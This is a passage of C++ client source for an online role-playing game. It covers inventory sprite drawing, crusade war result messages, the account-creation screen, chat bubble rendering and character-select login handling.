		{	cItemColor = m_pItemList[m_cItemOrder[i]]->m_cItemColor;
			if (m_bIsItemDisabled[ m_cItemOrder[i] ] == TRUE)
			{	if (cItemColor == 0)
					 m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_cItemOrder[i]]->m_sSprite]->PutTransSprite2(sX + 32 + m_pItemList[m_cItemOrder[i]]->m_sX,
					 	                                                sY + 44 + m_pItemList[m_cItemOrder[i]]->m_sY, m_pItemList[m_cItemOrder[i]]->m_sSpriteFrame, dwTime);
				else
				{	if (   (m_pItemList[m_cItemOrder[i]]->m_cEquipPos == DEF_EQUIPPOS_LHAND)
						|| (m_pItemList[m_cItemOrder[i]]->m_cEquipPos == DEF_EQUIPPOS_RHAND)
						|| (m_pItemList[m_cItemOrder[i]]->m_cEquipPos == DEF_EQUIPPOS_TWOHAND))
					{	m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_cItemOrder[i]]->m_sSprite]->PutTransSpriteRGB(sX + 32 + m_pItemList[m_cItemOrder[i]]->m_sX,
																			sY + 44 + m_pItemList[m_cItemOrder[i]]->m_sY, m_pItemList[m_cItemOrder[i]]->m_sSpriteFrame,
																			m_wWR[cItemColor] -m_wR[0], m_wWG[cItemColor] -m_wG[0], m_wWB[cItemColor] -m_wB[0],
																			dwTime);
					}else
					{	m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_cItemOrder[i]]->m_sSprite]->PutTransSpriteRGB(sX + 32 + m_pItemList[m_cItemOrder[i]]->m_sX,
																			sY + 44 + m_pItemList[m_cItemOrder[i]]->m_sY, m_pItemList[m_cItemOrder[i]]->m_sSpriteFrame,
																			m_wR[cItemColor] -m_wR[0], m_wG[cItemColor] -m_wG[0], m_wB[cItemColor] -m_wB[0],
																			dwTime);
				}	}
			}else
			{	if (cItemColor == 0)
					 m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_cItemOrder[i]]->m_sSprite]->PutSpriteFast(sX + 32 + m_pItemList[m_cItemOrder[i]]->m_sX,
																		sY + 44 + m_pItemList[m_cItemOrder[i]]->m_sY, m_pItemList[m_cItemOrder[i]]->m_sSpriteFrame, dwTime);
				else
				{	if (   (m_pItemList[m_cItemOrder[i]]->m_cEquipPos == DEF_EQUIPPOS_LHAND)
						|| (m_pItemList[m_cItemOrder[i]]->m_cEquipPos == DEF_EQUIPPOS_RHAND)
						|| (m_pItemList[m_cItemOrder[i]]->m_cEquipPos == DEF_EQUIPPOS_TWOHAND))
					{	m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_cItemOrder[i]]->m_sSprite]->PutSpriteRGB(sX + 32 + m_pItemList[m_cItemOrder[i]]->m_sX,
																			sY + 44 + m_pItemList[m_cItemOrder[i]]->m_sY, m_pItemList[m_cItemOrder[i]]->m_sSpriteFrame,
																			m_wWR[cItemColor] -m_wR[0], m_wWG[cItemColor] -m_wG[0], m_wWB[cItemColor] -m_wB[0],
																			dwTime);
					}else {
						m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_cItemOrder[i]]->m_sSprite]->PutSpriteRGB(sX + 32 + m_pItemList[m_cItemOrder[i]]->m_sX,
																			sY + 44 + m_pItemList[m_cItemOrder[i]]->m_sY, m_pItemList[m_cItemOrder[i]]->m_sSpriteFrame,
																			m_wR[cItemColor] -m_wR[0], m_wG[cItemColor] -m_wG[0], m_wB[cItemColor] -m_wB[0],
																			dwTime);
			}	}	}
			if (   (m_pItemList[m_cItemOrder[i]]->m_cItemType == DEF_ITEMTYPE_CONSUME)
				|| (m_pItemList[m_cItemOrder[i]]->m_cItemType == DEF_ITEMTYPE_ARROW) )
			{	DisplayCommaNumber_G_cTxt((int)m_pItemList[m_cItemOrder[i]]->m_dwCount); // nbe show, as US: 1,200,000
				PutString2(sX + 29 + m_pItemList[m_cItemOrder[i]]->m_sX +10, sY + 41 + m_pItemList[m_cItemOrder[i]]->m_sY +10
					, G_cTxt, 200,200,200);
	}	}	}
	if ((msX >= sX +23) && (msX <= sX +76) && (msY >= sY +172) && (msY <= sY +184))
	{	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX+23, sY+172, 1);
	}
	if ((msX >= sX +140) && (msX <= sX +212) && (msY >= sY +172) && (msY <= sY +184))
	{	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX+140, sY+172, 2);
	}
	// WaReS
	wsprintf(G_cTxt, " %d/%d ", uTotalItem, DEF_MAXITEMS);
    PutString2(sX + 90+5, sY - 3, G_cTxt, 200,200,200);
}


void CGame::CrusadeContributionResult(int iWarContribution)
{int i;
 char cTemp[120];
	DisableDialogBox(18);
	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++)
	{	if (m_pMsgTextList[i] != NULL)
			delete m_pMsgTextList[i];
		m_pMsgTextList[i] = NULL;
	}
	if (iWarContribution > 0)
	{	PlaySound('E', 23, 0, 0);
		PlaySound('C', 21, 0, 0);
		PlaySound('C', 22, 0, 0);
		m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[22]->m_pMsg, NULL); // Congratulations! Your nation
		m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[23]->m_pMsg, NULL); // was victory in the battle!
		m_pMsgTextList[2] = new class CMsg(NULL, " ", NULL);
		m_pMsgTextList[3] = new class CMsg(NULL, m_pGameMsgList[24]->m_pMsg, NULL); // As a victorious citizen
		m_pMsgTextList[4] = new class CMsg(NULL, m_pGameMsgList[25]->m_pMsg, NULL); // You will receive
		m_pMsgTextList[5] = new class CMsg(NULL, m_pGameMsgList[26]->m_pMsg, NULL); // a prize
		m_pMsgTextList[6] = new class CMsg(NULL, " ", NULL);
		m_pMsgTextList[7] = new class CMsg(NULL, m_pGameMsgList[27]->m_pMsg, NULL); // Experience point of the battle contribution:
		ZeroMemory(cTemp, sizeof(cTemp));											//
		wsprintf(cTemp, "+%dExp Points!", iWarContribution);
		m_pMsgTextList[8] = new class CMsg(NULL, cTemp, NULL);
		for (i = 9; i < 18; i++)
		m_pMsgTextList[i] = new class CMsg(NULL, " ", NULL);

	}else if (iWarContribution < 0)
	{	PlaySound('E', 24, 0, 0);
		PlaySound('C', 12, 0, 0);
		PlaySound('C', 13, 0, 0);
		m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[28]->m_pMsg, NULL); // Unfortunately! Your country
		m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[29]->m_pMsg, NULL); // have lost the all out war.
		m_pMsgTextList[2] = new class CMsg(NULL, " ", NULL);
		m_pMsgTextList[3] = new class CMsg(NULL, m_pGameMsgList[30]->m_pMsg, NULL); // As a losser citizen;
		m_pMsgTextList[4] = new class CMsg(NULL, m_pGameMsgList[31]->m_pMsg, NULL); // the prize that accomplishes
		m_pMsgTextList[5] = new class CMsg(NULL, m_pGameMsgList[32]->m_pMsg, NULL); // will not be given.
		m_pMsgTextList[6] = new class CMsg(NULL, " ", NULL);
		m_pMsgTextList[7] = new class CMsg(NULL, m_pGameMsgList[33]->m_pMsg, NULL); // I hope you to win
		m_pMsgTextList[8] = new class CMsg(NULL, m_pGameMsgList[34]->m_pMsg, NULL); // in the next battle
		for (i = 9; i < 18; i++)
		m_pMsgTextList[i] = new class CMsg(NULL, " ", NULL);
	}else if (iWarContribution == 0)
	{	PlaySound('E', 25, 0, 0);
		m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[50]->m_pMsg, NULL); // The battle that you have participated
		m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[51]->m_pMsg, NULL); // is already finished;
		m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[52]->m_pMsg, NULL); //
		m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
		m_pMsgTextList[4] = new class CMsg(NULL, m_pGameMsgList[53]->m_pMsg, NULL); // You must connect after finishing
		m_pMsgTextList[5] = new class CMsg(NULL, m_pGameMsgList[54]->m_pMsg, NULL); // the previous and before starting
		m_pMsgTextList[6] = new class CMsg(NULL, m_pGameMsgList[55]->m_pMsg, NULL); // the next battle so you can receive
		m_pMsgTextList[7] = new class CMsg(NULL, m_pGameMsgList[56]->m_pMsg, NULL); // the prize
		for (i = 8; i < 18; i++)
		m_pMsgTextList[i] = new class CMsg(NULL, " ", NULL);
	}
	EnableDialogBox(18, NULL, NULL, NULL);
}


void CGame::CrusadeWarResult(int iWinnerSide)
{int i, iPlayerSide;
	DisableDialogBox(18);
	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++)
	{	if (m_pMsgTextList[i] != NULL)
			delete m_pMsgTextList[i];
		m_pMsgTextList[i] = NULL;
	}
	if( m_bCitizen == FALSE ) iPlayerSide = 0;
	else if (m_bAresden == TRUE) iPlayerSide = 1;
	else if (m_bAresden == FALSE) iPlayerSide = 2;
	if (iPlayerSide == 0)
	{	switch (iWinnerSide) {
		case 0:
			PlaySound('E', 25, 0, 0);
			m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!
			m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[36]->m_pMsg, NULL); // There was a draw in the
			m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[37]->m_pMsg, NULL); // battle
			m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
			break;
		case 1:
			PlaySound('E', 25, 0, 0);
			m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!
			m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[38]->m_pMsg, NULL); // Aresden was victorious
			m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[39]->m_pMsg, NULL); // and put an end to the war
			m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
			break;
		case 2:
			PlaySound('E', 25, 0, 0);
			m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!
			m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[40]->m_pMsg, NULL); // Elvine was victorious
			m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[41]->m_pMsg, NULL); // and put an end to the war
			m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
			break;
		}
		for (i = 4; i < 18; i++)
			m_pMsgTextList[i] = new class CMsg(NULL, " ", NULL);
	}else
	{	if (iWinnerSide == 0)
		{	PlaySound('E', 25, 0, 0);
			m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!
			m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[36]->m_pMsg, NULL); // There was a draw in the
			m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[37]->m_pMsg, NULL); // battle
			m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
			for (i = 4; i < 18; i++)
				m_pMsgTextList[i] = new class CMsg(NULL, " ", NULL);
		}else
		{ 	if (iWinnerSide == iPlayerSide)
			{	PlaySound('E', 23, 0, 0);
				PlaySound('C', 21, 0, 0);
				PlaySound('C', 22, 0, 0);
				switch (iWinnerSide) {
				case 1:
					m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!;
					m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[38]->m_pMsg, NULL); // Aresden was victorious;
					m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[39]->m_pMsg, NULL); // and put an end to the war
					m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
					m_pMsgTextList[4] = new class CMsg(NULL, m_pGameMsgList[42]->m_pMsg, NULL); // Congratulations!
					m_pMsgTextList[5] = new class CMsg(NULL, m_pGameMsgList[43]->m_pMsg, NULL); // As a victorious citizen
					m_pMsgTextList[6] = new class CMsg(NULL, m_pGameMsgList[44]->m_pMsg, NULL); // You will receive
					m_pMsgTextList[7] = new class CMsg(NULL, m_pGameMsgList[45]->m_pMsg, NULL); // a prize
					break;
				case 2:
					m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!
					m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[40]->m_pMsg, NULL); // Elvine was victorious
					m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[41]->m_pMsg, NULL); // and put an end to the war
					m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
					m_pMsgTextList[4] = new class CMsg(NULL, m_pGameMsgList[42]->m_pMsg, NULL); // Congratulations!
					m_pMsgTextList[5] = new class CMsg(NULL, m_pGameMsgList[43]->m_pMsg, NULL); // As a victorious citizen
					m_pMsgTextList[6] = new class CMsg(NULL, m_pGameMsgList[44]->m_pMsg, NULL); // You will receive
					m_pMsgTextList[7] = new class CMsg(NULL, m_pGameMsgList[45]->m_pMsg, NULL); // a prize
					break;
				}
				for (i = 8; i < 18; i++)
					m_pMsgTextList[i] = new class CMsg(NULL, " ", NULL);
			}else if (iWinnerSide != iPlayerSide)
			{	PlaySound('E', 24, 0, 0);
				PlaySound('C', 12, 0, 0);
				PlaySound('C', 13, 0, 0);
				switch (iWinnerSide) {
				case 1:
					m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!
					m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[38]->m_pMsg, NULL); // Aresden was victorious;
					m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[39]->m_pMsg, NULL); // and put an end to the war
					m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
					m_pMsgTextList[4] = new class CMsg(NULL, m_pGameMsgList[46]->m_pMsg, NULL); // Unfortunately,
					m_pMsgTextList[5] = new class CMsg(NULL, m_pGameMsgList[47]->m_pMsg, NULL); // As a losser citizen
					m_pMsgTextList[6] = new class CMsg(NULL, m_pGameMsgList[48]->m_pMsg, NULL); // the prize that accomplishes
					m_pMsgTextList[7] = new class CMsg(NULL, m_pGameMsgList[49]->m_pMsg, NULL); // will not be given.
					break;
				case 2:
					m_pMsgTextList[0] = new class CMsg(NULL, m_pGameMsgList[35]->m_pMsg, NULL); // All out war finished!
					m_pMsgTextList[1] = new class CMsg(NULL, m_pGameMsgList[40]->m_pMsg, NULL); // Elvine was victorious
					m_pMsgTextList[2] = new class CMsg(NULL, m_pGameMsgList[41]->m_pMsg, NULL); // and put an end to the war
					m_pMsgTextList[3] = new class CMsg(NULL, " ", NULL);
					m_pMsgTextList[4] = new class CMsg(NULL, m_pGameMsgList[46]->m_pMsg, NULL); // Unfortunately,
					m_pMsgTextList[5] = new class CMsg(NULL, m_pGameMsgList[47]->m_pMsg, NULL); // As a losser citizen
					m_pMsgTextList[6] = new class CMsg(NULL, m_pGameMsgList[48]->m_pMsg, NULL); // the prize that accomplishes
					m_pMsgTextList[7] = new class CMsg(NULL, m_pGameMsgList[49]->m_pMsg, NULL); // will not be given.
					break;
				}
				for (i = 8; i < 18; i++)
					m_pMsgTextList[i] = new class CMsg(NULL, " ", NULL);
	}	}	}
	EnableDialogBox(18, NULL, NULL, NULL);
	DisableDialogBox(36);
	DisableDialogBox(37);
	DisableDialogBox(38);
}

void CGame::_Draw_UpdateScreen_OnCreateNewAccount()
{
	m_DDraw.ClearBackB4();
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_NEWACCOUNT, 0,0,0, TRUE);
	PutString2(329 + SCREENX, 110 + SCREENY, m_cAccountName, 200,200,200);
	PutString( 329 + SCREENX, 125 + SCREENY, m_cAccountPassword, RGB(200,200,200), TRUE, 1);
	PutString( 329 + SCREENX, 140 + SCREENY, m_cAccountPassword, RGB(200,200,200), TRUE, 1);
	PutString2(300 + SCREENX, 202 + SCREENY, m_cAccountCountry, 200,200,200);
	PutString2(300 + SCREENX, 218 + SCREENY, m_cAccountSSN, 200,200,200);
	PutString2(194 + SCREENX, 257 + SCREENY, m_cEmailAddr, 200,200,200);
}

void CGame::DrawChatMsgBox(short sX, short sY, int iChatIndex, BOOL bIsPreDC)
{
 char cMsg[100], cMsgA[22], cMsgB[22], cMsgC[22], * cp;
 int  iRet, iLines, i, iSize, iSize2, iLoc, iFontSize;
 DWORD dwTime;
 COLORREF rgb;
 BOOL bIsTrans;
 RECT rcRect;
 SIZE Size;

	ZeroMemory(cMsg, sizeof(cMsg));
	ZeroMemory(cMsgA, sizeof(cMsgA));
	ZeroMemory(cMsgB, sizeof(cMsgB));
	ZeroMemory(cMsgC, sizeof(cMsgC));

	dwTime = m_pChatMsgList[iChatIndex]->m_dwTime;
	strcpy(cMsg, m_pChatMsgList[iChatIndex]->m_pMsg);
	cp = (char *)cMsg;
	iLines = 0;

	rgb = RGB(255,255,255);
	switch (m_pChatMsgList[iChatIndex]->m_cType) {
	case 1:
		rgb = RGB(255,255,255);
		break;
	case 20:
		rgb = RGB(255,255,20);
		// ޽ ǥÿ ̰ ɸ.
		if ((m_dwCurTime - dwTime) < 650) return;
		else dwTime += 650;
		break;
	case 41:
		rgb = RGB(255,80,80);
		break;

	case 42:
		rgb = RGB(255,80,80);
		if ((m_dwCurTime - dwTime) < 650) return;
		else dwTime += 650;
		break;
	}

	if (strlen(cp) != 0) {
		memcpy(cMsgA, cp, 20);

		iRet = GetCharKind(cMsgA, 19);
		if (iRet == CODE_HAN1) {
			cMsgA[20] = cp[20];
			cp++;
		}
		cp += 20;
		iLines = 1;
	}

	if (strlen(cp) != 0) {
		memcpy(cMsgB, cp, 20);

		iRet = GetCharKind(cMsgB, 19);
		if (iRet == CODE_HAN1) {
			cMsgB[20] = cp[20];
			cp++;
		}
		cp += 20;
		iLines = 2;
	}

	if (strlen(cp) != 0) {
		memcpy(cMsgC, cp, 20);

		iRet = GetCharKind(cMsgC, 19);
		if (iRet == CODE_HAN1) {
			cMsgC[20] = cp[20];
			cp++;
		}
		cp += 20;
		iLines = 3;
	}

	iSize = 0;
	for (i = 0; i < 20; i++)
	if (cMsgA[i] != 0)

	if ((unsigned char)cMsgA[i] >= 128) {
		iSize += 5;	//6
		i++;
	}
	else iSize += 4;

	iLoc = m_dwCurTime - dwTime;
	switch (m_pChatMsgList[iChatIndex]->m_cType) {
	case 21:
	case 22:
	case 23://...
		if( iLoc > 80 ) iLoc = 10;
		else iLoc = iLoc>>3;
		break;
	default://
		if( iLoc > 352 ) iLoc = 9;
		else if( iLoc > 320 ) iLoc = 10;
		else iLoc = iLoc>>5;
		break;
	}

	if (m_cDetailLevel == 0)
		 bIsTrans = FALSE;
	else bIsTrans = TRUE;

	switch (m_pChatMsgList[iChatIndex]->m_cType) {
	case 41:
	case 42:
		iSize2 = 0;
		for (i = 0; i < 100; i++)
		if (cMsg[i] != 0)
		if ((unsigned char)cMsg[i] >= 128) {
			iSize2 += 5;
			i++;
		}
		else iSize2 += 4;
		if( m_Misc.bCheckIMEString(cMsg) == FALSE )
		{
			PutString(sX - iSize2, sY - 65 - iLoc, cMsg, RGB(180, 30, 30));
			PutString(sX - iSize2+1, sY - 65 - iLoc, cMsg, RGB(180, 30, 30));
		}
		else PutString_SprFont3(sX - iSize2, sY - 65 - iLoc, cMsg, m_wR[14]*4, m_wG[14]*4, m_wB[14]*4, FALSE, 0);
		break;

	case 21:
	case 22:
	case 23:
		iFontSize = 23 - (int)m_pChatMsgList[iChatIndex]->m_cType;
		switch (iLines) {
		case 1:
			PutString_SprFont3(sX - iSize, sY - 65 - iLoc, cMsgA, m_wR[13]*2, m_wG[13]*2, m_wB[13]*2, bIsTrans, iFontSize);
			break;
		case 2:
			PutString_SprFont3(sX - iSize, sY - 81 - iLoc,  cMsgA, m_wR[13]*2, m_wG[13]*2, m_wB[13]*2, bIsTrans, iFontSize);
			PutString_SprFont3(sX - iSize, sY - 65 - iLoc,  cMsgB, m_wR[13]*2, m_wG[13]*2, m_wB[13]*2, bIsTrans, iFontSize);
			break;
		case 3:
			PutString_SprFont3(sX - iSize, sY - 97 - iLoc, cMsgA, m_wR[13]*2, m_wG[13]*2, m_wB[13]*2, bIsTrans, iFontSize);
			PutString_SprFont3(sX - iSize, sY - 81 - iLoc, cMsgB, m_wR[13]*2, m_wG[13]*2, m_wB[13]*2, bIsTrans, iFontSize);
			PutString_SprFont3(sX - iSize, sY - 65 - iLoc, cMsgC, m_wR[13]*2, m_wG[13]*2, m_wB[13]*2, bIsTrans, iFontSize);
			break;
		}
		break;

	case 20:
	default:
		if (bIsPreDC == FALSE)
			m_DDraw._GetBackBufferDC();

		GetTextExtentPoint32(m_DDraw.m_hDC, cMsg, strlen(cMsg), &Size);

		switch (Size.cx / 160) {
		case 0:
			SetRect(&rcRect, sX-80 +1, sY-65 -iLoc, sX+80 +1, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-65 -iLoc +1, sX+80, sY -iLoc +1);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-65 -iLoc, sX+80, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, rgb);
			break;

		case 1:
			SetRect(&rcRect, sX-80 +1, sY-83 -iLoc, sX+80 +1, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-83 -iLoc +1, sX+80, sY -iLoc +1);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-83 -iLoc, sX+80, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, rgb);
			break;

		case 2:
			SetRect(&rcRect, sX-80 +1, sY-101 -iLoc, sX+80 +1, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-101 -iLoc +1, sX+80, sY -iLoc +1);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-101 -iLoc, sX+80, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, rgb);
			break;

		case 3:
			SetRect(&rcRect, sX-80 +1, sY-119 -iLoc, sX+80 +1, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-119 -iLoc +1, sX+80, sY -iLoc +1);
			m_DDraw.DrawText(&rcRect, cMsg, RGB(0,0,0));

			SetRect(&rcRect, sX-80, sY-119 -iLoc, sX+80, sY -iLoc);
			m_DDraw.DrawText(&rcRect, cMsg, rgb);
			break;
		}

		if (bIsPreDC == FALSE)
			m_DDraw._ReleaseBackBufferDC();
		break;
	}
}

void CGame::ClearContents_OnSelectCharacter()
{
	m_cCurFocus = 1;
}



void CGame::UpdateScreen_OnSelectCharacter()
{
 short sX, sY, msX, msY, msZ;
 char  cLB, cRB, cTotalChar;
 char  cMIresult;
 static class CMouseInterface * pMI;
 DWORD dwTime;
 static DWORD dwCTime;

 int iMIbuttonNum;

	dwTime = timeGetTime();
	sX = 0;
	sY = 0;
	cTotalChar = 0;

	if (m_cGameModeCount == 0)
	{	G_cSpriteAlphaDegree = 1;
		InitGameSettings();
		pMI = new class CMouseInterface;
		pMI->AddRect(100 + SCREENX, 50 + SCREENY, 210 + SCREENX, 250 + SCREENY);
		pMI->AddRect(211 + SCREENX, 50 + SCREENY, 321 + SCREENX, 250 + SCREENY);
		pMI->AddRect(322 + SCREENX, 50 + SCREENY, 431 + SCREENX, 250 + SCREENY);
		pMI->AddRect(432 + SCREENX, 50 + SCREENY, 542 + SCREENX, 250 + SCREENY);

		pMI->AddRect(360 + SCREENX,283 + SCREENY,545 + SCREENX,315 + SCREENY);
		pMI->AddRect(360 + SCREENX,316 + SCREENY,545 + SCREENX,345 + SCREENY);
		pMI->AddRect(360 + SCREENX,346 + SCREENY,545 + SCREENX,375 + SCREENY);
		pMI->AddRect(360 + SCREENX,376 + SCREENY,545 + SCREENX,405 + SCREENY);
		pMI->AddRect(360 + SCREENX,406 + SCREENY,545 + SCREENX,435 + SCREENY);

		m_cMaxFocus = 4;
		if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
		if (m_cCurFocus < 1)		   m_cCurFocus = 1;

		m_cArrowPressed = 0;
		m_bEnterPressed = FALSE;

		dwCTime = timeGetTime();
	}

	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_cArrowPressed != 0)
	{	switch (m_cArrowPressed) {
		case 2:
			m_cCurFocus++;
			if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;
		case 4:
			m_cCurFocus--;
			if (m_cCurFocus <= 0) m_cCurFocus = m_cMaxFocus;
			break;
		}
		m_cArrowPressed = 0;
	}

	if (m_bEscPressed == TRUE)
	{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	if (m_bEnterPressed == TRUE)
	{	m_bEnterPressed = FALSE;
		PlaySound('E', 14, 5);

		if (m_pCharList[m_cCurFocus-1] != NULL)
		{	if (m_pCharList[m_cCurFocus-1]->m_sSex != NULL)
			{	ZeroMemory(m_cPlayerName, sizeof(m_cPlayerName));
				strcpy(m_cPlayerName, m_pCharList[m_cCurFocus-1]->m_cName);
				m_iLevel = (int)m_pCharList[m_cCurFocus-1]->m_sLevel;
				if (m_Misc.bCheckValidString(m_cPlayerName) == TRUE)
				{	m_pSprite[DEF_SPRID_INTERFACE_ND_LOGIN]->_iCloseSprite();
					m_pSprite[DEF_SPRID_INTERFACE_ND_MAINMENU]->_iCloseSprite();
					m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
                    GetIPByDNS();
					m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort +(rand()%1), WM_USER_LOGSOCKETEVENT);
					m_pLSock->bInitBufferSize(30000);
					ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
					m_dwConnectMode  = MSGID_REQUEST_ENTERGAME;
					m_wEnterGameType = DEF_ENTERGAMEMSGTYPE_NEW;
					ZeroMemory(m_cMsg, sizeof(m_cMsg));
					strcpy(m_cMsg,"33");
					ZeroMemory(m_cMapName, sizeof(m_cMapName));
					memcpy(m_cMapName, m_pCharList[m_cCurFocus-1]->m_cMapName, 10);
					delete pMI;
					return;
			}	}
		}else
		{	_InitOnCreateNewCharacter();
			ChangeGameMode(DEF_GAMEMODE_ONCREATENEWCHARACTER);
			delete pMI;
			return;
		}
	}

	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	UpdateScreen_OnSelectCharacter(sX, sY, msX, msY);

	if ((dwTime - dwCTime) > 100)
	{	m_cMenuFrame++;
		dwCTime = dwTime;
	}
	if (m_cMenuFrame >= 8)
	{	m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8)
		{	m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;

	DrawVersion();
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK) {
		PlaySound('E', 14, 5);

		switch (iMIbuttonNum) {
		case 1:
		case 2:
		case 3:
		case 4:
			if (m_cCurFocus != iMIbuttonNum)
				m_cCurFocus = iMIbuttonNum;
			else
			{	if (m_pCharList[m_cCurFocus-1] != NULL)
				{	if (m_pCharList[m_cCurFocus-1]->m_sSex != NULL)
					{	ZeroMemory(m_cPlayerName, sizeof(m_cPlayerName));
						strcpy(m_cPlayerName, m_pCharList[m_cCurFocus-1]->m_cName);
						m_iLevel = (int)m_pCharList[m_cCurFocus-1]->m_sLevel;
						if (m_Misc.bCheckValidString(m_cPlayerName) == TRUE)
						{	m_pSprite[DEF_SPRID_INTERFACE_ND_LOGIN]->_iCloseSprite();
							m_pSprite[DEF_SPRID_INTERFACE_ND_MAINMENU]->_iCloseSprite();
							m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
							GetIPByDNS();
							m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort +(rand()%1), WM_USER_LOGSOCKETEVENT);
							m_pLSock->bInitBufferSize(30000);
							ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
							m_dwConnectMode  = MSGID_REQUEST_ENTERGAME;
							m_wEnterGameType = DEF_ENTERGAMEMSGTYPE_NEW;
							ZeroMemory(m_cMsg, sizeof(m_cMsg));
							strcpy(m_cMsg,"33");
							ZeroMemory(m_cMapName, sizeof(m_cMapName));
							memcpy(m_cMapName, m_pCharList[m_cCurFocus-1]->m_cMapName, 10);
							delete pMI;
							return;
					}	}
				}else
				{	_InitOnCreateNewCharacter();
					ChangeGameMode(DEF_GAMEMODE_ONCREATENEWCHARACTER);
					delete pMI;
					return;
				}
			}
			break;

		case 5:
			if (m_pCharList[m_cCurFocus - 1] != NULL)
			{	if (m_pCharList[m_cCurFocus-1]->m_sSex != NULL)
				{	ZeroMemory(m_cPlayerName, sizeof(m_cPlayerName));
					strcpy(m_cPlayerName, m_pCharList[m_cCurFocus-1]->m_cName);
					m_iLevel = (int)m_pCharList[m_cCurFocus-1]->m_sLevel;

					if (m_Misc.bCheckValidString(m_cPlayerName) == TRUE) {
						m_pSprite[DEF_SPRID_INTERFACE_ND_LOGIN]->_iCloseSprite();
						m_pSprite[DEF_SPRID_INTERFACE_ND_MAINMENU]->_iCloseSprite();
